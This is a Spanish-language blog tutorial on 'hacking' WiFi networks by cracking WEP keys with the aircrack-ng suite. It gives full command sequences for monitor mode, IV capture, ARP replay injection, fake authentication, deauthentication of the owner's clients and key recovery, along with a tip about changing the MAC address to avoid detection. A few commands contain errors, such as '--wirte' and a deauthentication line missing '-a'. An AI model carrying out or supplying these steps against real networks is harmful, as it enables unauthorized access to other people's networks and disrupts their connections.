Aquí veremos paso a paso como desencriptar una red inalámbrica para conectarnos a ella, o como normalmente se conoce Hackear una Red Wifi, esto se hace básicamente con herramientas que se utilizar para observar las vulnerabilidades de las redes inalámbricas, si logras sacar la contraseña esto nos dice que esa red es vulnerable, el uso de estas herramientas y tutorial, depende del uso que cada persona le quiera dar.

• Herramientas que se necesitan

1.- Alguna distribución de Linux (de Preferencia Ubuntu)

2.- Adaptador inalámbrico que soporte inyección de paquetes, podemos ver la lista aquí “Pagina Oficial”

3.- AirCrack

4.- IMPORTANTE: Si deseas que no detecten tu direccion MAC puedes cambiarla, entra aquí, te explico como cambiarla

PD: Yo no cambio la direccion MAC ya que utilizo un adaptador solo para sacar contraseñas y no lo uso para conectarme a la red despues.

• Primer paso, verificar que nuestro adaptador inalámbrico sea compatible.

Si es un adaptador USB, en una Terminal escribimos

Los datos que nos arrojara serán similares a estos, en mi caso el chipset de el adaptador es RTL8187

Ya que tenemos que chipset tiene nuestro adaptador entramos a ver la lista aquí “Pagina Oficial de AirCrack”.

Si el Chipset se encuentra en el listado y es soportado, tenemos la opción de instalar los drivers modificados para hacer este proceso, el cual no afectan el funcionamiento normal de nuestro Adaptador.

• Segundo paso, instalar la suite de aircrack en consola
  

1.- Entramos como administrador (root)

sudo su

2.- Escribimos nuestra contraseña

3.- Procedemos a realizar la instalación.

apt-get install aircrack-ng

Nos preguntara si deseamos continuar con la instalación ponemos la letra “Y” para decir que si deseamos continuar.

Esperamos a que se descarguen, instalen y configuren los paquetes.

una ves que termino podemos comenzar a sacar contraseñas.

• Video Explicativo

• Video Explicativo de en que casos debemos utilizar otro tipo de ataque

Si ES PROBABLE QUE NO TENGA CLIENTES CONECTADOS LA RED DEBEMOS INTENTAR CON EL ATAQUE CHOP-CHOP ENTRA AQUÍ TE EXPLICO COMO.

• Pasos para desencriptar o sacar contraseña de una red inalambrica (wifi)

IMPORTANTE:

• Necesitaremos mantener abiertas varias terminales, no cierren las anteriores,

• También necesitamos que el dueño de la Red a hackear este conectado a su red en el  momento para este tipo de ataque.

• SI NO AUMENTAN LOS ARP Y LOS ACKs EN APROXIMADAMENTE 2 o 3 MINUTOS EN EL PASO No. 7, ES PROBABLE QUE NO TENGA CLIENTES CONECTADOS LA RED ASI QUE DEBEMOS INTENTAR CON EL ATAQUE CHOP-CHOP ENTRA AQUÍ TE EXPLICO COMO
  

1.- Abrimos la Primer Terminal entramos como administrador (root)

sudo su

2.- Escribimos nuestra contraseña

3.- Revisaremos en que interfaz esta nuestro adaptador inalámbrico

iwconfig

4.- Iniciaremos nuestro adaptador en modo monitor

airmon-ng start interfaz

Donde:

interfaz: Es la de nuestro adaptador en mi caso es wlan0

5.- Veremos las redes disponibles y a las que podremos sacar la contraseña que son las que tienesn encriptacion WEP.

airodump-ng mon0

Nos saldra lo siguiente, (lo dejamos un minuto aproximadamente, para  que tenga tiempo de escanear todos los canales) pasado un minuto aprox. precionamos CTRL + C para cancelar.

6.- Comenzamos a enviar paquetes a la red seleccionada en mi caso sera la Linksys (con L mayúscula)

Este es el orden que tenemos que seguir para escribir los comandos

airodump-ng --ivs -c canal --wirte archivo  mon0

Donde:

canal: Escribe el Canal (CH) de la Red

archivo: Escribe el nombre del archivo donde se capturaran los ivs, recomiendo que sea el mismo nombre de la red para no confundirlo.

Ejemplo con la Red Linksys

airodump-ng --ivs -c 6 --write Linksys mon0

7.- Capturamos paquetes

Abrimos otra terminal, la anterior la dejamos procesando.

Escribimos los siguientes comandos

aireplay-ng -3 -b BSSID mon0

Donde:

BSSID: Direccion MAC del Router/Modem a sacar la contraseña.

Ejemplo con la Red Linksys

aireplay-ng -3 -b 00:13:10:D0:25:66 mon0

IMPORTANTE: SI NO AUMENTAN LOS ARP Y LOS ACKs EN APROXIMADAMENTE 2 o 3 MINUTOS, ES PROBABLE QUE NO TENGA CLIENTES CONECTADOS LA RED ASI QUE DEBEMOS INTENTAR CON EL ATAQUE CHOP-CHOP ENTRA AQUI TE EXPLICO COMO

8.-  Realizamos peticiones de conexion

Abrimos una 3er Terminal y escribimos

aireplay-ng -1 0 -a BSSID mon0

Donde:

BSSID: Direccion MAC del Router/Modem a sacar la contraseña.

Ejemplo con la Red Linksys

aireplay-ng -1 0 -a 00:13:10:D0:25:66 mon0

PD: Cambie ubuntu por la versión 10 por eso tiene otro color la consola.

9.- Lanzamos desautenticacion

aireplay-ng -0 0 -a BSSID mon0

Donde:

BSSID: Direccion MAC del Router/Modem a sacar la contraseña.

Ejemplo con la Red Linksys

aireplay-ng -0 0 00:13:10:D0:25:66 mon0

10.- Ya que tengamos aprox. 5 minutos inyectando paquetes procedemos a sacar la contraseña

aircrack-ng archivo*.ivs

Ejemplo con la Red Linksys

aircrack-ng Linksys*.ivs

• Video Explicativo